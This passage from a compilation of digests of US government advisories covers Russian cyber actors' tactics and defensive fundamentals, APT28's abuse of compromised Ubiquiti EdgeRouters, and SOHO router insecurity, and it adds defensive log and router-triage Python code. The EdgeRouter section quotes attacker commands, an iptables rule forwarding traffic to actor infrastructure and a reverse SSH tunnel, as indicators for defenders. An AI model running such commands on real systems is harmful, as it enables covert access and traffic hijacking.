Beyond technical capabilities, the actors have shown adeptness in psychological and social engineering tactics. These methods are designed to manipulate individuals into divulging sensitive information or performing actions that compromise security. Phishing campaigns, spear-phishing, and other forms of social engineering are frequently used to gain initial access to target networks or to escalate privileges once inside.

5) Target Selection and Intelligence Gathering
The target selection process is strategic and aligned with Russia's national interests. Targets are carefully chosen based on their potential to provide valuable intelligence, whether political, economic, technological, or military. Once a target is compromised, the actors focus on long-term access and intelligence gathering, prioritizing stealth and persistence over immediate gains. This approach allows them to build a comprehensive picture of the target's activities, relationships, and plans.

6) Adaptability to the Cybersecurity Landscape
One of the most defining aspects of these actors is their adaptability. The shift towards targeting cloud services and exploiting service and dormant accounts is a testament to it. By continuously refining their methods and exploring new vectors of attack, the actors remain a persistent and evolving threat in the cyber domain.

J. Defense through Cybersecurity Fundamentals
1) Defense through Cybersecurity Fundamentals in the APT
In the contemporary cybersecurity landscape, marked by the sophisticated operations of such actors, the importance of adhering to cybersecurity fundamentals cannot be overstated. While advanced threats continue to evolve, leveraging cutting-edge tactics, techniques, and procedures (TTPs), a strong foundation in cybersecurity fundamentals remains a critical line of defense for organizations across all sectors. This foundational approach

to cybersecurity emphasizes the implementation of best practices, policies, and controls designed to protect against a wide range of threats, including those from highly sophisticated adversaries.

2) Understanding Cybersecurity Fundamentals
• Access Control: Ensuring that only authorized users have access to information systems and data, and that they can perform only the actions necessary for their role.
• Data Encryption: Protecting data at rest and in transit through encryption, making it unreadable to unauthorized users.
• Patch Management: Regularly updating software and systems to address vulnerabilities and reduce the risk of exploitation.
• Firewalls and Intrusion Detection Systems (IDS): Implementing firewalls to block unauthorized access and IDS to monitor network traffic for suspicious activity.
• Multi-Factor Authentication (MFA): Requiring users to provide two or more verification factors to gain access to systems, significantly enhancing security.
• Security Awareness Training: Educating employees about cybersecurity risks and best practices to prevent social engineering attacks and other threats.
• Incident Response Planning: Preparing for potential security incidents with a well-defined plan for response and recovery.

3) The Role of Fundamentals in Defending Against Sophisticated Threats
While sophisticated cyber actors such as these employ advanced techniques to bypass security measures, many of their strategies still exploit basic security weaknesses, such as poor password management, unpatched software, and insufficient access controls. By adhering to cybersecurity fundamentals, organizations can address these weaknesses, making it significantly more difficult for attackers to gain initial access or move laterally within a network.

For example, the implementation of MFA can prevent unauthorized access even if credentials are compromised. Regular patch management closes known vulnerabilities before they can be exploited once a fix is public (it cannot, by definition, stop a true zero-day, which is why the other controls have to hold on their own). Security awareness training can reduce the risk of employees falling victim to phishing or other social engineering tactics.

4) Challenges in Maintaining Cybersecurity Fundamentals
Despite the clear benefits, maintaining a strong foundation in cybersecurity fundamentals can be challenging for organizations. This can be due to a variety of factors, including resource constraints, the complexity of modern IT environments, and the rapid pace of technological change. Additionally, as organizations increasingly adopt cloud services and other advanced technologies, the cybersecurity landscape becomes more complex, requiring continuous adaptation of fundamental security practices.

5) Strategies for Strengthening Fundamental Defenses
• Continuous Risk Assessment: Regularly assessing the organization's security posture to identify vulnerabilities and prioritize remediation efforts.
• Leveraging Security Frameworks: Adopting comprehensive security frameworks, such as the NIST Cybersecurity Framework, to guide the implementation of best practices and controls.
• Automating Security Processes: Using automation to streamline security processes, such as patch management and monitoring, to enhance efficiency and effectiveness.
• Fostering a Culture of Security: Building a strong security culture within the organization, where cybersecurity is viewed as a shared responsibility among all employees.
• Collaboration and Information Sharing: Engaging in collaboration and information sharing with industry peers and government agencies to stay informed about emerging threats and best practices.

K. Mitigations to Strengthen Defense
1) Mitigations to Strengthen Defense Against APT
In the context of heightened cyber threats from sophisticated actors, organizations must employ a comprehensive set of mitigations to strengthen their defenses. These mitigations are designed to address vulnerabilities across various aspects of an organization's infrastructure and operations, thereby reducing the risk of successful cyber-attacks. Implementing them requires a strategic approach that encompasses both technical solutions and organizational processes.

2) Key Mitigation Strategies
• Implement Multi-Factor Authentication (MFA): MFA is one of the most effective controls for securing user accounts against compromise. By requiring multiple forms of verification, MFA makes it significantly more difficult for attackers to gain unauthorized access, even if they have obtained a user's credentials.
• Regular Patching and Updates: Keeping software and systems up to date with the latest patches is crucial for closing security gaps that could be exploited by attackers. A regular patch management process should be established to ensure timely application of updates.
• Network Segmentation: Dividing the network into smaller, controlled segments can limit an attacker's ability to move laterally within the network and access sensitive areas. Segmentation also helps contain potential breaches to a smaller subset of the network.
• Endpoint Protection: Deploying advanced endpoint protection solutions can help detect and prevent malicious activity on devices that access the organization's network. This includes antivirus software, host-based intrusion prevention systems, and endpoint detection and response (EDR) tools.

• Security Awareness Training: Educating employees about cybersecurity risks and best practices is essential for preventing social engineering attacks, such as phishing. Regular training helps create a culture of security awareness within the organization.
• Least Privilege Access Control: Ensuring that users have only the access rights necessary for their role helps minimize the potential impact of account compromise. Access controls should be regularly reviewed and adjusted as necessary.
• IR Planning: Having a well-defined and tested incident response plan enables organizations to respond quickly and effectively to security incidents, minimizing damage and restoring operations as soon as possible.
• Continuous Monitoring and Detection: Implementing continuous monitoring and detection capabilities can help identify suspicious activity early. This includes security information and event management (SIEM) systems, intrusion detection systems (IDS), and network traffic analysis.
• Secure Configuration and Hardening: Systems should be securely configured and hardened against attacks. This involves disabling unnecessary services, applying secure configuration settings, and ensuring that security features are enabled.
• Backup and Recovery: Regular backups of critical data and systems, along with robust recovery procedures, are essential for resilience against ransomware and other destructive attacks. Backups should be tested regularly to ensure they can be relied upon in an emergency.

3) Challenges in Implementing Mitigations
While these mitigations are effective in theory, organizations often face challenges in their implementation. These include limited resources, the complexity of IT environments, the need for specialized skills, and the difficulty of balancing security with business requirements. Additionally, the rapidly evolving nature of cyber threats means that mitigation strategies must be continually reassessed and updated.

4) Collaborative Efforts and Information Sharing
To overcome these challenges and enhance the effectiveness of mitigations, organizations can engage in collaborative efforts and information sharing with industry partners, government agencies, and cybersecurity communities. This collaboration provides access to shared knowledge, threat intelligence, and best practices that can inform and improve an organization's mitigation efforts.

L. Benefits and drawbacks of NSA's advisory
1) Benefits:
• Awareness and Understanding: The document raises awareness about the shift in tactics towards cloud services, which is crucial for organizations to understand the current threat landscape.
• Detailed TTPs: It provides detailed information on the tactics, techniques, and procedures (TTPs) used by the actors, including the use of service and dormant accounts, which can help organizations identify potential threats and vulnerabilities.
• Sector-Specific Insights: The document outlines the expansion of targeting to sectors such as aviation, education, law enforcement, and military organizations, offering sector-specific insights that can help these industries bolster their defenses.
• Mitigation Strategies: It offers practical mitigation strategies that organizations can implement to strengthen their defenses against initial access by the actors, such as implementing MFA and managing system accounts.
• Emphasis on Fundamentals: The advisory emphasizes the importance of cybersecurity fundamentals, which can help organizations establish a strong baseline defense against sophisticated actors.
• Global Supply Chain Relevance: The document references the actors' involvement in the SolarWinds supply chain compromise, highlighting the global implications of such cyber espionage activities.

2) Drawbacks:
• Resource Intensity: Implementing the recommended mitigations may require significant resources, which could be challenging for smaller organizations with limited cybersecurity budgets and personnel.
• Complexity of Cloud Security: The document points out the inherent challenges in securing cloud infrastructure, which may require specialized knowledge and skills that not all organizations possess.
• Evolving Tactics: While the document provides current TTPs, the actors' tactics are constantly evolving, which means that defenses based solely on this advisory may quickly become outdated.
• Potential for Overemphasis on Specific Threats: Focusing too much on these actors could lead organizations to neglect other threat actors or vectors that are equally dangerous but not covered in the document.
• Shared Responsibility Model: The document implies a shared responsibility model for cloud security, which may lead to confusion about the division of security responsibilities between cloud providers and customers.
• False Sense of Security: Organizations might develop a false sense of security by relying on the suggested mitigations without considering the need for a dynamic and adaptive security posture to respond to new threats.

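The detection and audit points above (credential stuffing under F.4, anomaly detection under F.5, dormant-account audits and monitoring under H.5, continuous monitoring under K.2) are described but not shown. The following is an added example, not code from the advisory or from this digest: it runs three checks over a constructed sign-in export and a constructed account inventory. The field layout (ISO timestamp, user, source IP, result) and the thresholds are assumptions; adapt them to your identity provider's export format and your sign-in volumes.

```python
"""Sign-in log analytics for the initial-access and dormant-account TTPs above.

Added example, not tooling from the advisory. The inventory and the log are
constructed to resemble a generic identity provider's export; the field layout
(timestamp, user, source IP, result) and the thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed inventory: last recorded sign-in and whether the identity holds
# any privileged role. Dates are ISO 8601 (YYYY-MM-DD).
ACCOUNTS = {
    "alice@example.com":          {"type": "user",    "last_seen": "2024-05-30", "privileged": False},
    "svc-backup@example.com":     {"type": "service", "last_seen": "2024-05-31", "privileged": True},
    "bob.contractor@example.com": {"type": "user",    "last_seen": "2023-11-02", "privileged": True},
}

# Constructed log: one source sprays six accounts in 40 seconds and lands on a
# contractor account nobody has used for months; alice mistypes twice from her
# usual address; the backup service account behaves normally.
SIGNIN_LOG = """\
2024-06-01T02:14:03Z alice@example.com 203.0.113.7 failure
2024-06-01T02:14:05Z carol@example.com 203.0.113.7 failure
2024-06-01T02:14:08Z dave@example.com 203.0.113.7 failure
2024-06-01T02:14:11Z erin@example.com 203.0.113.7 failure
2024-06-01T02:14:15Z frank@example.com 203.0.113.7 failure
2024-06-01T02:14:40Z bob.contractor@example.com 203.0.113.7 success
2024-06-01T08:59:50Z alice@example.com 198.51.100.20 failure
2024-06-01T08:59:58Z alice@example.com 198.51.100.20 failure
2024-06-01T09:00:05Z alice@example.com 198.51.100.20 success
2024-06-01T09:30:00Z svc-backup@example.com 198.51.100.21 success
"""

def parse_signins(text):
    """Turn the export into a list of event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, user, ip, result = parts
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "ip": ip, "ok": result == "success"})
    return events

def detect_credential_stuffing(events, min_users=5, min_failure_ratio=0.8):
    """Flag sources that tried many distinct accounts and mostly failed: the
    shape of stuffing or spraying, as opposed to one user fumbling one password.
    Returns {ip: {distinct_users, failure_ratio, compromised}}."""
    by_ip = defaultdict(lambda: {"users": set(), "attempts": 0, "failures": 0, "hits": set()})
    for e in events:
        s = by_ip[e["ip"]]
        s["users"].add(e["user"])
        s["attempts"] += 1
        if e["ok"]:
            s["hits"].add(e["user"])      # accounts this source actually got into
        else:
            s["failures"] += 1
    flagged = {}
    for ip, s in by_ip.items():
        ratio = s["failures"] / s["attempts"]
        if len(s["users"]) >= min_users and ratio >= min_failure_ratio:
            flagged[ip] = {"distinct_users": len(s["users"]),
                           "failure_ratio": round(ratio, 2),
                           "compromised": sorted(s["hits"])}
    return flagged

def detect_dormant_reactivation(events, accounts, dormant_days=90):
    """(user, timestamp) for successful sign-ins to accounts whose last recorded
    use is older than dormant_days: a dormant account waking up is the H.5 alert."""
    hits = []
    for e in events:
        if not e["ok"] or e["user"] not in accounts:
            continue
        last = datetime.strptime(accounts[e["user"]]["last_seen"], "%Y-%m-%d")
        if e["ts"] - last > timedelta(days=dormant_days):
            hits.append((e["user"], e["ts"].isoformat()))
    return hits

def audit_inventory(accounts, as_of, dormant_days=90):
    """Inventory-side check (the 'regular audits' point): privileged accounts
    idle for longer than dormant_days should be disabled before anyone else uses them."""
    cutoff = datetime.strptime(as_of, "%Y-%m-%d") - timedelta(days=dormant_days)
    return sorted(u for u, a in accounts.items()
                  if a["privileged"] and datetime.strptime(a["last_seen"], "%Y-%m-%d") < cutoff)

if __name__ == "__main__":
    ev = parse_signins(SIGNIN_LOG)
    print("stuffing sources:", detect_credential_stuffing(ev))
    print("dormant reactivations:", detect_dormant_reactivation(ev, ACCOUNTS))
    print("privileged dormant accounts:", audit_inventory(ACCOUNTS, "2024-06-01"))
```

The three checks are deliberately separate: the inventory audit would have disabled the contractor account before the spray ever succeeded, the reactivation rule catches the case where the audit was missed, and the per-source ratio keeps a user's own typos from paging anyone. In production the per-IP grouping needs to tolerate attackers rotating through a proxy pool, so group by ASN or by a short time window as well.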
NSA'S PANIC. UBIQUITI

Abstract – This document provides a comprehensive analysis of the joint Cybersecurity Advisory (CSA) released by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners, detailing the exploitation of compromised Ubiquiti EdgeRouters by APT28 to facilitate malicious cyber operations globally. The analysis delves into various aspects of the advisory, including the tactics, techniques, and procedures (TTPs) employed by the threat actors, indicators of compromise (IOCs), and recommended mitigation strategies for network defenders and EdgeRouter users.

This qualitative summary of the CSA provides valuable insights for cybersecurity professionals, network defenders, and specialists across various sectors, offering a deeper understanding of the nature of state-sponsored cyber threats and practical guidance on enhancing network security against sophisticated adversaries. The analysis is particularly useful for those involved in securing critical infrastructure, as it highlights the evolving tactics of cyber threat actors and underscores the importance of international collaboration in cybersecurity efforts.

A. Introduction
The document titled "Cyber Actors Use Compromised Routers to Facilitate Cyber Operations", released by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners, warns of the use of compromised Ubiquiti EdgeRouters to facilitate malicious cyber operations worldwide.

The popularity of Ubiquiti EdgeRouters, with legitimate users and attackers alike, is attributed to their user-friendly, Linux-based operating system. They are often shipped with default credentials and limited or no firewall protection, and they do not automatically update their firmware unless the user configures them to.

The compromised EdgeRouters have been used by APT28 to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools. APT28 accessed the routers using default credentials and trojanized OpenSSH server processes. With root access to the compromised routers, the actors had unfettered access to the Linux-based operating system to install tooling and obfuscate their identity.

APT28 also deployed custom Python scripts on the compromised routers to collect and validate stolen webmail account credentials obtained through cross-site scripting and browser-in-the-browser spear-phishing campaigns. Additionally, they exploited a critical zero-day elevation-of-privilege vulnerability in Microsoft Outlook (CVE-2023-23397) to collect NTLMv2 digests from targeted Outlook accounts and used publicly available tools to assist with NTLM relay attacks.

B. Keypoints and takeaways
• APT28 (also known as Fancy Bear, Forest Blizzard, and Strontium) has been exploiting compromised Ubiquiti EdgeRouters to conduct malicious cyber operations globally, since at least 2022, against various industries and countries, including the US.
• The exploitation includes harvesting credentials, collecting NTLMv2 digests, proxying network traffic, and hosting spear-phishing landing pages and custom tools.
• The FBI, NSA, US Cyber Command, and international partners have issued a joint Cybersecurity Advisory (CSA) detailing the threat and providing mitigation recommendations.
• The advisory includes observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), maps the threat actors' activity to the MITRE ATT&CK framework, and explains how defenders can map their own observations to it; defenders should use both to detect and respond to potential compromises.
• The EdgeRouters are popular for their user-friendly Linux-based operating system but are often shipped with default credentials and limited firewall protection.
• The advisory urges immediate action by organizations using Ubiquiti EdgeRouters: perform a hardware factory reset, update to the latest firmware, change default usernames and passwords, and implement strategic firewall rules on WAN-side interfaces.

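The introduction and keypoints above name three things a defender can check for directly: the default account, the missing WAN-side firewall, and the replaced OpenSSH binary. The following is an added example, not tooling from the advisory or from this digest, for triaging an EdgeRouter offline before the factory reset the advisory calls for. It assumes the router's filesystem (or a copy) is mounted under some root; that EdgeOS, being Debian-based, keeps its running configuration in the Vyatta brace format, ships "ubnt" as the default account, and installs the OpenSSH daemon at /usr/sbin/sshd; and that a known-good sshd digest has been taken from a clean firmware image of the same version. The sample configuration is constructed.

```python
"""Offline triage of an EdgeRouter image for the APT28 tradecraft described above.

Added example, not tooling from the advisory. Assumptions: the device filesystem
is mounted under `root`; EdgeOS stores its configuration in the Vyatta brace
format; 'ubnt' is the factory account; sshd lives at usr/sbin/sshd. The
INSECURE_CONFIG text is constructed to resemble a factory-fresh config.boot.
"""
import hashlib
from pathlib import Path

DEFAULT_USER = "ubnt"
SSHD_RELATIVE = Path("usr/sbin/sshd")
# Artifact locations given for the credential-harvesting scripts and their logs
HARVESTER_GLOBS = ("home/*/srv/core.py", "home/*/srv/debug.txt")

INSECURE_CONFIG = """\
interfaces {
    ethernet eth0 {
        address dhcp
    }
}
system {
    host-name ubnt
    login {
        user ubnt {
            authentication {
                encrypted-password $6$REDACTED
            }
            level admin
        }
    }
}
/* Warning: Do not remove the following line. */
/* === vyatta-config-version: "config-management@1" === */
"""

def parse_config(text):
    """Minimal reader for the Vyatta/EdgeOS brace format: 'key [name] {' opens a
    nested dict keyed by the whole header, 'key value' is a leaf, '}' closes.
    Repeated leaf keys overwrite, which is fine for reading but not for rewriting."""
    root, stack, node = {}, [], None
    node = root
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("/*"):
            continue
        if line == "}":
            node = stack.pop() if stack else root
        elif line.endswith("{"):
            stack.append(node)
            node = node.setdefault(line[:-1].strip(), {})
        else:
            key, _, value = line.partition(" ")
            node[key] = value
    return root

def config_findings(text, wan_interface="eth0"):
    """Findings for the two weaknesses the advisory calls out: the factory account
    surviving, and the WAN interface accepting traffic addressed to the router
    itself without a 'local' firewall ruleset bound to it."""
    cfg = parse_config(text)
    findings = []
    users = cfg.get("system", {}).get("login", {})
    if f"user {DEFAULT_USER}" in users:
        findings.append(f"default account '{DEFAULT_USER}' still present")
    iface = cfg.get("interfaces", {}).get(f"ethernet {wan_interface}", {})
    if not iface.get("firewall", {}).get("local", {}).get("name"):
        findings.append(f"no local firewall ruleset bound to {wan_interface}")
    return findings

def find_harvester_artifacts(root):
    """Paths (relative to root, POSIX form) matching the core.py/debug.txt locations."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for g in HARVESTER_GLOBS for p in root.glob(g))

def sshd_matches_baseline(root, baseline_sha256):
    """Compare the installed sshd with a digest from a clean image of the same
    firmware version. A mismatch means reimage the device, not repair it."""
    path = Path(root) / SSHD_RELATIVE
    if not path.is_file():
        return False
    return hashlib.sha256(path.read_bytes()).hexdigest() == baseline_sha256

if __name__ == "__main__":
    for finding in config_findings(INSECURE_CONFIG):
        print("config:", finding)
    print("harvester artifacts under /:", find_harvester_artifacts("/"))
```

Run against a mounted image, `config_findings` reads the config.boot text, `find_harvester_artifacts` lists any core.py or debug.txt under a home directory, and `sshd_matches_baseline` confirms whether the daemon is the vendor's. None of this replaces the advisory's remediation (factory reset, firmware update, new credentials, WAN-side firewall rules); it tells you which devices need it first and preserves the debug.txt logs for the investigation before the reset wipes them.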
C. Threat Actor Activity
APT28's operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation. The targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US, with a strategic focus on individuals in Ukraine.
Potential consequences and impacts on these affected industries include:
• Data breaches and theft of sensitive information, intellectual property, or trade secrets.
• Disruption of critical infrastructure operations, such as power grids, transportation systems, or manufacturing processes.
• Compromise of government networks and systems, potentially leading to espionage or national security threats.
• Financial losses due to operational disruptions, theft of customer data, or reputational damage.
• Potential safety risks if control systems or operational technology (OT) networks are compromised.
• Loss of customer trust and confidence in the affected organizations.
D. Moobot OpenSSH Trojan
APT28 actors have been leveraging default credentials and trojanized OpenSSH server processes to access Ubiquiti EdgeRouters. The trojanized OpenSSH server processes are associated with Moobot, a Mirai-based botnet that infects Internet of Things (IoT) devices using remotely exploitable vulnerabilities, such as weak or default passwords.
1) Trojanized OpenSSH Server Binaries
Trojanized OpenSSH server binaries downloaded from packinstall[.]kozow[.]com have replaced legitimate binaries on EdgeRouters accessed by APT28. These trojanized binaries allow remote attackers to bypass authentication and gain unauthorized access to the compromised routers.
The Moobot botnet is known for its ability to exploit vulnerabilities in IoT devices, particularly those with weak or default passwords. By replacing the legitimate OpenSSH server binaries with trojanized versions, APT28 actors can maintain persistent access to the compromised EdgeRouters and use them for various malicious purposes.
2) Mirai-based Botnet
Moobot is a Mirai-based botnet, which means it is derived from the infamous Mirai malware that first emerged in 2016. Mirai is designed to scan for and infect IoT devices by exploiting common vulnerabilities and using default credentials. Once a device is infected, it becomes part of the botnet and can be used for distributed denial-of-service (DDoS) attacks, credential stuffing, and other malicious activities.
The use of a Mirai-based botnet like Moobot highlights the importance of securing IoT devices, such as routers, by changing default passwords and keeping the firmware up to date. The combination of weak or default passwords and unpatched vulnerabilities makes these devices an attractive target for threat actors like APT28.
3) Impact on Compromised EdgeRouters
With the trojanized OpenSSH server processes in place, APT28 actors can maintain persistent access to the compromised EdgeRouters. This allows them to use the routers as a platform for various malicious activities, such as:
• Harvesting credentials
• Collecting NTLMv2 digests
• Proxying network traffic
• Hosting spear-phishing landing pages and custom tools
E. Credential Access via Python Scripts
APT28 actors have been hosting custom Python scripts on compromised Ubiquiti EdgeRouters to collect and validate stolen webmail account credentials. These scripts are typically stored alongside related log files in the home directory of a compromised user, such as:
• /home/<compromised user>/srv/core.py
• /home/<compromised user>/srv/debug.txt
The FBI claims that they have recovered verbose log files containing information about APT28 activity on the compromised EdgeRouters.
1) Custom Python Scripts
The custom Python scripts hosted on the compromised EdgeRouters serve the purpose of collecting and validating stolen webmail account credentials. APT28 actors use these scripts as part of their credential harvesting operations, targeting specific webmail users.
The scripts are designed to automatically break captcha problems on webmail login pages, allowing the actors to bypass this security measure and gain unauthorized access to the targeted accounts. To achieve this, the scripts make connections to the API endpoint api[.]anti-captcha[.]com, which is used by APT28 actors for captcha-solving purposes.
2) Yara Rule for Detection
To help network defenders locate credential collection scripts on compromised EdgeRouters, the FBI has created a Yara rule. Yara is a tool used to identify and classify malware based on textual or binary patterns. The FBI-provided Yara rule can be used to scan the file system of EdgeRouters and detect the presence of the custom Python scripts used by APT28 actors.
In addition to using the Yara rule, network defenders can also query network traffic for connections to the api[.]anti-captcha[.]com endpoint. Detecting traffic to this API can help identify compromised EdgeRouters and potential credential harvesting activities.
3) Mitigation and Investigation
Upon detecting the presence of custom Python scripts or connections to the api[.]anti-captcha[.]com endpoint, network defenders should take immediate action to mitigate the risk and investigate the extent of the compromise:
• Isolating the affected EdgeRouters from the network
• Performing a thorough analysis of the scripts and log files to understand the scope of the credential harvesting activities
• Resetting passwords for potentially compromised webmail accounts
F. Exploitation of CVE-2023-23397
APT28 actors have been exploiting CVE-2023-23397, a critical elevation of privilege vulnerability in Microsoft Outlook on Windows, to facilitate NTLMv2 credential leaks. This vulnerability, which was a zero-day at the time of its initial exploitation by APT28 in early 2022, allows Net-NTLMv2 hashes to be leaked to actor-controlled infrastructure.
1) NTLMv2 Credential Harvesting
To exploit CVE-2023-23397 and harvest NTLMv2 credentials, APT28 actors have been using two publicly available tools:
• ntlmrelayx.py: This tool is part of the Impacket suite, a collection of Python classes for working with network protocols. APT28 actors have used ntlmrelayx.py to execute NTLM relay attacks [T1557] and facilitate the leakage of NTLMv2 credentials.
• Responder: Responder is a tool designed to capture and relay NTLMv2 hashes by setting up a rogue authentication server [T1556]. APT28 actors have installed Responder on compromised Ubiquiti EdgeRouters to collect NTLMv2 credentials from targeted Outlook accounts.
The FBI has collected evidence of APT28's CVE-2023-23397 exploitation activity on numerous compromised EdgeRouters.
a) Logging and Detection
When using the default configurations, Responder logs its activity to the following files:
• Responder-Session.log
• Responder.db
Network defenders and users can search for these log files, as well as the presence of ntlmrelayx.py and Responder tooling, on EdgeRouters to identify potential APT28 activity related to the exploitation of CVE-2023-23397.
2) Mitigation and Investigation
To mitigate the risk of CVE-2023-23397 exploitation and NTLMv2 credential leaks, network defenders and users should take the following steps:
• Apply the Microsoft patch: Microsoft has released a patch to address CVE-2023-23397. Ensure that all Outlook installations are updated with the latest security updates.
• Scan for compromised EdgeRouters: Use the provided information to scan EdgeRouters for the presence of ntlmrelayx.py, Responder, and their associated log files. Identify and isolate any compromised routers for further investigation.
• Reset compromised credentials: If NTLMv2 credential leaks are detected, reset the affected user accounts and implement additional security measures, such as multi-factor authentication.
• Implement recommended mitigations: Follow the recommended mitigations for compromised EdgeRouters, including performing a hardware factory reset, upgrading to the latest firmware version, and changing default usernames and passwords.
G. Proxy and Tunnel Infrastructure
APT28 actors have been using compromised Ubiquiti EdgeRouters to establish proxy connections and reverse SSH tunnels to their dedicated infrastructure. This allows them to maintain persistent access and control over the compromised devices, even after password changes or other mitigation attempts.
1) Reverse Proxy Connections
APT28 actors have utilized iptables rules on EdgeRouters to establish reverse proxy connections to their dedicated infrastructure. Network defenders and users can review iptables chains and Bash histories on EdgeRouters for unusual invocations, such as the following example:

iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT --to-destination <APT28 dedicated infrastructure>:10081

This iptables rule redirects incoming traffic on port 4443 of the EdgeRouter to the APT28 dedicated infrastructure on port 10081, effectively creating a reverse proxy connection.
2) Reverse SSH Tunnels
Additionally, APT28 actors have uploaded adversary-controlled SSH RSA keys to compromised EdgeRouters to establish reverse SSH tunnels. These tunnels allow the actors to access the compromised devices, even after password changes or other mitigation attempts.
Network defenders and users can review the following directories on EdgeRouters for unknown RSA keys:
• /root/.ssh/
• /home/<user>/.ssh/
The presence of unknown RSA keys in these directories may indicate that adversaries have used them to access the EdgeRouters, bypassing password authentication.
Furthermore, network defenders can query network traffic logs on EdgeRouters to identify abnormal SSH sessions. An
invocation of a reverse SSH tunnel used by APT28 actors is provided below:

ssh -i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>

This command establishes a reverse SSH tunnel from the EdgeRouter to the APT28 infrastructure, allowing the actors to maintain remote access and control over the compromised device.
H. MASEPIE Malware
In December 2023, APT28 actors developed MASEPIE, a small Python backdoor capable of executing arbitrary commands on victim machines. An FBI investigation revealed that on more than one occasion, APT28 used compromised Ubiquiti EdgeRouters as command-and-control (C2) infrastructure for MASEPIE backdoors deployed against targets.
1) Command-and-Control Infrastructure
While APT28 does not deploy MASEPIE on EdgeRouters themselves, the compromised routers have been used as C2 infrastructure to communicate with and control MASEPIE backdoors installed on systems belonging to targeted individuals and organizations.
The data sent to and from the EdgeRouters acting as C2 servers was encrypted using a randomly generated 16-character AES key, making it more difficult to detect and analyze the malicious traffic.
2) MASEPIE Backdoor Functionality
MASEPIE is a Python-based backdoor that allows APT28 actors to execute arbitrary commands on the infected systems. This backdoor provides the threat actors with a persistent foothold and remote control capabilities, enabling them to carry out various malicious activities, such as:
• Data exfiltration
• Lateral movement within the compromised network
• Deployment of additional malware or tools
• Execution of reconnaissance and intelligence-gathering commands
3) Mitigation and Investigation
To mitigate the risk of MASEPIE backdoors and the use of compromised EdgeRouters as C2 infrastructure, network defenders and users should take the following steps:
• Implement endpoint protection: Deploy advanced endpoint protection solutions capable of detecting and preventing the execution of MASEPIE and other malicious Python scripts or backdoors.
• Monitor network traffic: Closely monitor network traffic for any suspicious encrypted communications or connections to known APT28 infrastructure, including compromised EdgeRouters.
• Analyze network logs: Review network logs for any indications of encrypted communications or connections to EdgeRouters that may be acting as C2 servers.
I. MITRE ATT&CK TACTICS AND TECHNIQUES
The provided tables map the tactics and techniques used by the APT28 threat actor to the MITRE ATT&CK framework. Here's a summary of the information:
1) Resource Development:
T1587 (Develop Capabilities): APT28 authored custom Python scripts to collect webmail account credentials.
T1588 (Obtain Capabilities): APT28 accessed EdgeRouters compromised by the Moobot botnet, which installs OpenSSH trojans.
2) Initial Access:
T1584 (Compromise Infrastructure): APT28 accessed EdgeRouters previously compromised by an OpenSSH trojan.
T1566 (Phishing): APT28 conducted cross-site scripting and browser-in-the-browser spear-phishing campaigns.
3) Execution:
T1203 (Exploitation for Client Execution): APT28 exploited the CVE-2023-23397 vulnerability.
4) Persistence:
T1546 (Event Triggered Execution): The compromised routers housed Bash scripts and ELF binaries designed to backdoor OpenSSH daemons and related services.
5) Credential Access:
T1557 (Adversary-in-the-Middle): APT28 installed tools like Impacket ntlmrelayx.py and Responder on compromised routers to execute NTLM relay attacks.
T1556 (Modify Authentication Process): APT28 hosted NTLMv2 rogue authentication servers to modify the authentication process using stolen credentials from NTLM relay attacks.
6) Collection:
T1119 (Automated Collection): APT28 utilized CVE-2023-23397 to automate the collection of NTLMv2 hashes.
7) Exfiltration:
T1020 (Automated Exfiltration): APT28 utilized CVE-2023-23397 to automate the exfiltration of data to actor-controlled infrastructure.
NSA’S PANIC.
SOHO
Abstract – This document provides an in-depth analysis of the threats posed by malicious cyber actors exploiting insecure Small Office/Home Office (SOHO) routers. The analysis covers various aspects, including Security Defects and Exploits, Impact on Critical Infrastructure, Secure by Design Principles, Vulnerability and Exposure Research.
The document offers a qualitative summary of the current state of SOHO router security, highlighting the risks posed by insecure devices and the steps that can be taken to mitigate these risks. The analysis is beneficial for security professionals, manufacturers, and various industry sectors, providing a comprehensive understanding of the threats and guiding principles for enhancing the security of SOHO routers.
A. Introduction
The exploitation of insecure SOHO routers by malicious cyber actors, particularly state-sponsored groups, poses a significant threat to individual users and critical infrastructure. Manufacturers are urged to adopt secure by design principles and transparency practices to mitigate these risks, while users and network defenders are advised to implement best practices for router security and remain vigilant against potential threats.
B. Root Causes of Insecure SOHO Routers
The root causes of insecure SOHO routers are multifaceted, involving both technical vulnerabilities and lapses in secure design and development practices by manufacturers, as well as negligence on the part of users in maintaining router security.
• Widespread Vulnerabilities: A significant number of vulnerabilities, totaling 226, have been identified in popular SOHO router brands. These vulnerabilities range in severity but collectively pose a substantial security risk.
• Outdated Components: Core components such as the Linux kernel and additional services like VPN in these routers are outdated. This makes them susceptible to known exploits for vulnerabilities that have long since been made public.
• Insecure Default Settings: Many routers come with easy-to-guess default passwords and use unencrypted connections. This can be easily exploited by attackers.
• Lack of Secure Design and Development: SOHO routers often lack basic security features due to insecure design and development practices. This includes the absence of automatic update capabilities and the presence of exploitable defects, particularly in web management interfaces.
• Exposure of Management Interfaces: Manufacturers frequently create devices with management interfaces exposed to the public internet by default, often without notifying the customers of this frequently unsafe configuration.
• Lack of Transparency and Accountability: There is a need for manufacturers to embrace transparency by disclosing product vulnerabilities through the CVE program and accurately classifying these vulnerabilities using the Common Weakness Enumeration (CWE) system.
• Neglect of Security in Favor of Convenience and Features: Manufacturers prioritize ease of use and a wide variety of features over security, leading to routers that are "secure enough" right out of the box without considering the potential for exploitation.
